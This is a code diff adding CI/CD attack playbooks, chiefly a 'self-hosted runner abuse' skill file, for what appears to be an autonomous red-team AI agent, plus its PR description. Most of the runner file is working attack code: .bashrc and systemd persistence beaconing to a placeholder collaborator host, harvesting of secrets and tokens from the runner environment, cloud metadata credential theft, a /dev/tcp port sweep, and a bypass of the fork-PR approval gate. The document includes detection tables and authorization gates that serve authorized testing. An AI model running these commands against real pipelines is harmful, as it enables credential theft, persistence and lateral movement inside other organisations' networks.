+| D-PPE on protected branch via stale review approval | Push to PR after approval (use `dismiss_stale_reviews`-misconfigured repos) |
+| I-PPE on self-hosted runner | Persistence via cron / systemd; see `self-hosted-runner-abuse/SKILL.md` |
+| I-PPE -> push tag / publish package via `GITHUB_TOKEN` | Downstream supply-chain compromise |
+
+## Tools
+
+| Tool | Use |
+|---|---|
+| `gato` / `gato-x` | Scans orgs for PPE-prone workflows, automates fork-PR PoC |
+| `actionlint` | Reverse-use: flags `pull_request_target` + PR-head checkout |
+| `octoscan`, `zizmor` | Static workflow analyzers |
+| `tj-actions/changed-files` CVE-2025-30066 | Real-world I-PPE-via-action precedent |
+
+## Detection signatures (defender view)
+
+| Signal | Where |
+|---|---|
+| Edit to `.github/workflows/*` in a fork PR | GitHub UI flags "workflow file change" on first run; defenders watch for it |
+| New `postinstall` / `preinstall` / `prepare` in `package.json` diff | `git log -p package.json` |
+| New outbound network from CI runner during build | egress filtering on runner subnet |
+| `pull_request_target` + checkout of `head.sha` | static lint (`zizmor`, `octoscan`) |
+
+## Decision gate
+
+1. Confirm written scope covers CI/CD testing.
+2. PoC payload = single DNS / HTTPS beacon, no real secret exfil.
+3. Open the PR from a clearly-labeled `security-research-*` fork; close + delete after capture.
+4. Never push to protected branches, never publish artifacts, never tag releases.
+
+## References
+
+- "Top 10 CI/CD Security Risks" — Cider Security / OWASP (CICD-SEC-04 PPE)
+- Palawan / Cider PPE taxonomy
+- `tj-actions/changed-files` incident (Mar 2025) — supply-chain via reused action

--- a/packages/decepticon/decepticon/skills/standard/exploit/cicd/self-hosted-runner-abuse/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/cicd/self-hosted-runner-abuse/SKILL.md
@@ -1,0 +1,187 @@
+---
+name: self-hosted-runner-abuse
+description: "Self-hosted runner abuse — non-ephemeral runner persistence, fork-PR job execution on self-hosted, runner-label targeting, secret/token theft from runner env, lateral movement from runner into internal network and cloud metadata services."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: execution
+  when_to_use: "self-hosted runner github actions runner gitlab runner persistence lateral movement imds metadata internal network ephemeral runner label"
+  tags: ci-cd, self-hosted-runner, persistence, lateral-movement
+  mitre_attack: T1078.004, T1133, T1554, T1021
+---
+
+# Self-Hosted Runner Abuse
+
+Self-hosted runners are attacker dreams: long-lived machines inside the target's network, with the build user's filesystem, often persistent between jobs, frequently reachable to internal services and cloud metadata. **Default GitHub policy on public repos is to NOT run workflows from first-time contributors without approval — but the gate is per-repo and frequently relaxed.**
+
+## Recon — does the target use self-hosted?
+
+```bash
+# 1. Workflow labels
+grep -rnE 'runs-on:\s*(\[\s*self-hosted|self-hosted)' <REPO>/.github/workflows/
+
+# 2. Custom labels signal self-hosted runners ("linux-large", "internal", "gpu-a100")
+grep -rnE 'runs-on:\s*\[?[a-z0-9_-]+' <REPO>/.github/workflows/ \
+  | grep -vE 'ubuntu-(latest|20|22|24)|windows-(latest|20)|macos-(latest|13|14)'
+
+# 3. Public run history reveals runner hostnames
+gh run list --repo <OWNER>/<REPO> --limit 20 --json databaseId,name | jq -r '.[].databaseId' \
+  | while read id; do gh run view "$id" --repo <OWNER>/<REPO> --log 2>/dev/null \
+      | grep -iE 'Runner name|Runner group|Machine name'; done | sort -u
+
+# 4. Org-level runner registrations (auth required, but org members often have read)
+gh api "orgs/<OWNER>/actions/runners" --jq '.runners[] | {name,os,status,labels:[.labels[].name]}'
+```
+
+## Default vs ephemeral
+
+| Mode | Behavior | Attacker upside |
+|---|---|---|
+| **Default (non-ephemeral)** | Same VM/container picks up the next job. `/home/runner/work/_temp/`, `~/.cache`, env from prior jobs may persist. | Persist files; reuse leaked creds; race the next job |
+| **Ephemeral** (`--ephemeral`) | Runner exits after one job; VM is destroyed | Per-job isolation; persistence requires escape to host |
+| **`actions/runner-images` self-hosted on K8s with ARC** | Pod per job, but cluster identity (`ServiceAccount`) is shared | Pivot to cluster API via projected token |
+
+```bash
+# Inside a job — fingerprint the runner
+uname -a; id; whoami
+mount | grep -E '/home|/runner|overlay'
+ls -la /actions-runner /home/runner /opt/actions-runner 2>/dev/null
+env | grep -E 'RUNNER_|GITHUB_' | head
+# Ephemeral runners typically have RUNNER_TEMP wiped; non-ephemeral have leftover dirs
+ls -la "$RUNNER_TEMP/.." 2>/dev/null
+```
+
+## Fork-PR execution on self-hosted
+
+```yaml
+# DANGEROUS — fork PRs run on the org's self-hosted fleet
+on: pull_request
+jobs:
+  test:
+    runs-on: [self-hosted, linux, internal]
+    steps:
+      - uses: actions/checkout@v4
+      - run: make test
+```
+
+If the repo did not enable "Require approval for all outside collaborators", a fork PR with a poisoned `Makefile` (see `poisoned-pipeline-execution/SKILL.md`) gives RCE on the internal runner. **First-time-contributor approval is also bypassable**: contribute a trivial PR first, get it merged, then weaponize subsequent PRs as a returning contributor.
+
+## Persistence on non-ephemeral runners
+
+```bash
+# In the malicious job step
+RUNNER_BIN="$(dirname "$(which Runner.Listener 2>/dev/null || echo /actions-runner/run.sh)")"
+echo "Found runner at: $RUNNER_BIN"
+
+# 1. Drop a payload in a path the runner sources before next job
+mkdir -p "$HOME/.config"
+cat > "$HOME/.config/runner-helper.sh" <<'EOF'
+# Beacon — runs as the runner user on next shell-step entry
+nohup bash -c 'while true; do curl -s "https://<COLLAB>/beacon/$(hostname)"; sleep 3600; done' &>/dev/null &
+EOF
+
+# 2. Hook into bash via runner user's .bashrc — works for any step using a login shell
+grep -q runner-helper "$HOME/.bashrc" || echo 'source "$HOME/.config/runner-helper.sh"' >> "$HOME/.bashrc"
+
+# 3. systemd --user unit (if lingering enabled)
+mkdir -p "$HOME/.config/systemd/user"
+cat > "$HOME/.config/systemd/user/beacon.service" <<'EOF'
+[Unit] Description=research beacon
+[Service] ExecStart=/usr/bin/curl -s https://<COLLAB>/svc/%H
+Restart=always
+[Install] WantedBy=default.target
+EOF
+systemctl --user daemon-reload && systemctl --user enable --now beacon.service 2>/dev/null || true
+```
+
+**Stop**. In an authorized engagement, set the beacon TTL to one hit and document removal steps. Persistence proves the capability; do not actually persist.
+
+## Token / secret theft from runner env
+
+```bash
+# All secrets used in the current job are in env vars or files actions wrote
+env | grep -iE 'token|secret|password|key|aws_|gcp_|azure_|registry|npm_' | head
+ls -la "$RUNNER_TEMP" "$HOME/.docker" "$HOME/.aws" "$HOME/.kube" 2>/dev/null
+
+# GITHUB_TOKEN is mounted in env and as `.credential` for git
+cat "$HOME/work/_temp/_github_workflow/event.json" 2>/dev/null | head -20
+git config --global --get-all credential.helper
+
+# Other jobs' artifacts may still be on disk on non-ephemeral runners
+find / -name 'event.json' -path '*_github_workflow*' 2>/dev/null
+find /tmp /var/tmp "$RUNNER_TEMP/.." -type f -newer /etc/hostname 2>/dev/null | head -50
+```
+
+Cross-reference `cicd-secrets-exfil/SKILL.md` for masking-bypass and OIDC exchange once a token is in hand.
+
+## Lateral movement from the runner
+
+```bash
+# 1. Cloud metadata — runner is almost always on EC2/GCE/Azure VM
+curl -sH 'Metadata-Token: required' http://169.254.169.254/latest/meta-data/      # AWS IMDSv1 (often allowed even when v2 enforced for users)
+TOKEN=$(curl -sX PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 60' http://169.254.169.254/latest/api/token)
+curl -sH "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
+curl -s -H 'Metadata-Flavor: Google' 'http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token'
+curl -sH 'Metadata: true' 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'
+
+# 2. Internal network — runner is often on a private VPC subnet with reach to staging/prod
+ip route; cat /etc/resolv.conf
+# Quick TCP sweep with bash builtins (no nmap install needed)
+for ip in 10.0.0.{1..20}; do
+  for p in 22 80 443 5432 6379 8080 9090; do
+    (echo >/dev/tcp/$ip/$p) 2>/dev/null && echo "$ip:$p open"
+  done
+done
+
+# 3. Kubernetes ServiceAccount (ARC / self-hosted on K8s)
+ls /var/run/secrets/kubernetes.io/serviceaccount/ 2>/dev/null
+cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null | cut -c1-12
+```
+
+## Runner-label targeting
+
+If the org has a label `gpu-a100` mapped to a specific physical host, crafting a workflow with `runs-on: [self-hosted, gpu-a100]` pins your job to that host. Useful to:
+
+- Target a specific build operator's machine (developer workstation runners are a pattern in some orgs).
+- Land on a runner with weaker egress controls (e.g. `windows-build-old` left from a migration).
+
+```yaml
+# Reachability test — does the org let arbitrary fork-PRs target privileged labels?
+on: pull_request
+jobs:
+  pin:
+    runs-on: [self-hosted, prod-deploy]
+    steps: [{ run: 'hostname; id; env | grep -i deploy' }]
+```
+
+## Detection signatures
+
+| Signal | Source |
+|---|---|
+| Outbound DNS/HTTP from runner to non-allowlisted host | egress firewall / Suricata |
+| New `~/.bashrc` / systemd user unit on a non-ephemeral runner | host EDR (osquery, Falco) |
+| `runs-on:` self-hosted + `on: pull_request` (not `pull_request_target` w/ approval) | zizmor / octoscan |
+| First-time-contributor PR approved + immediate follow-up PR | GitHub Insights / org-level review |
+| IMDS access from a runner's job | VPC flow logs / cloud audit |
+
+## Tools
+
+| Tool | Use |
+|---|---|
+| `gato-x runners` | Enumerates self-hosted runners across an org, identifies PPE targets |
+| `octoscan` | Flags self-hosted + untrusted-trigger combinations |
+| `runner-images` (GitHub) | Compare against the official ephemeral image to spot persistence diffs |
+| `osquery` / `falco` | Defender-side; useful to know what they see |
+
+## Decision gate
+
+1. Self-hosted runner engagements have higher blast radius than hosted — get explicit written authorization for **lateral movement** and **metadata access**, not just CI execution.
+2. Do not exfil cloud creds. `curl -s 169.254.169.254/.../security-credentials/` and **print first 8 chars only**.
+3. Remove any persistence (`.bashrc` entry, systemd unit, dropped files) before declaring done. Include cleanup commands in the report.
+4. Never pivot to a machine outside the runner's subnet without separate authorization.
+
+## References
+
+- GitHub docs — "About self-hosted runners" (limitations + warnings)
+- Praetorian — "Self-Hosted GitHub Runners Are Backdoors"
+- Adnan Khan — runner-takeover writeups (Tesla, Microsoft, et al.)
+- `actions-runner-controller` (ARC) — ephemeral runner pattern on K8s


### PR DESCRIPTION
## Summary

Adds a CI/CD pipeline attack playbook suite under `packages/decepticon/decepticon/skills/standard/exploit/cicd/`, mirroring the multi-leaf parent+children pattern already used by `ics-ot/` and `supplychain/`.

CI/CD belongs under the **Exploit** agent's tree — initial pipeline compromise, expression injection, runner abuse, and secret/OIDC exfil are all execution / credential-access primitives.

## Leaves

| Skill | MITRE | What it covers |
|---|---|---|
| `cicd/` (parent) | T1195, T1199, T1078, T1554 | Provider fingerprinting (GH Actions / GitLab / Jenkins / Circle / Buildkite / Drone / Azure / Travis), workflow file recon, risky-surface triage, secret-exposure surface, decision gate |
| `poisoned-pipeline-execution/` | T1195.002, T1199, T1059 | Direct + Indirect PPE via `Makefile`, `package.json` scripts, `build.gradle`, `pom.xml`, `Dangerfile`, `.pre-commit-config.yaml`, `setup.py`; `pull_request_target` abuse; fork-PR build triggers |
| `github-actions-injection/` | T1059, T1078.004, T1554 | `\${{ github.event.* }}` expression injection (issue/PR title, body, branch name, commit message) into `run:` steps; `pull_request_target` + PR-head checkout; `GITHUB_TOKEN` permission abuse; artifact/cache poisoning; action tag-vs-SHA pinning (`tj-actions/changed-files` CVE-2025-30066 class) |
| `self-hosted-runner-abuse/` | T1078.004, T1133, T1554, T1021 | Non-ephemeral runner persistence, fork-PR job execution on self-hosted, runner-label targeting, secret/token theft from runner env, lateral movement into IMDS / internal subnets / K8s ServiceAccount |
| `cicd-secrets-exfil/` | T1552.001, T1552.007, T1078.004, T1528 | `echo`/`printenv` exfil, log-masking bypass (base64/hex/char-split/reversal), OIDC token minting + cloud role assumption (AWS/GCP/Azure), `GITHUB_TOKEN` / `CI_JOB_TOKEN` scope abuse, cache/artifact secret leakage, Sigstore provenance pivot |

## Format

Matches existing skills (`graphql`, `open-redirect`, `ics-modbus`, `dep-confusion`): YAML frontmatter (`name` == dirname, `allowed-tools: Bash Read Write`, `metadata` with `when_to_use` / `mitre_attack` / `subdomain` / `tags`), body with intro → recon/detection → technique sections with concrete YAML/bash examples → chains → tools → detection-signature tables → decision gate.

All examples use \`<TARGET>\` / \`<REPO>\` / \`<OWNER>\` / \`<COLLAB>\` placeholders. PoC payloads are beacon-only (DNS/HTTP callback, length + first/last 4 chars of a secret) and every leaf ends with a decision gate that forbids real secret exfil, role assumption, or artifact publishing.

## Validation

- Frontmatter parses via \`yaml.safe_load\`; \`name\` == dirname verified for every leaf.
- \`uv run ruff check .\` — clean.
- Skills test suite green:
  \`\`\`
  uv run pytest -p no:xdist -q \\
    packages/decepticon/tests/unit/tools/test_skills_loader.py \\
    packages/decepticon/tests/unit/tools/test_skills_registry.py \\
    packages/decepticon/tests/unit/tools/test_skills.py \\
    packages/decepticon/tests/unit/middleware/test_skills.py \\
    packages/decepticon/tests/unit/backends/test_skills_path.py
  # 111 passed
  \`\`\`
- No code, dependency, or \`pyproject.toml\` changes — skill files only.

## Scope discipline

These are authorized defensive red-team playbooks. Every leaf's decision gate requires written scope authorization, beacon-only PoCs, and explicit cleanup of any persistence / artifacts created during testing.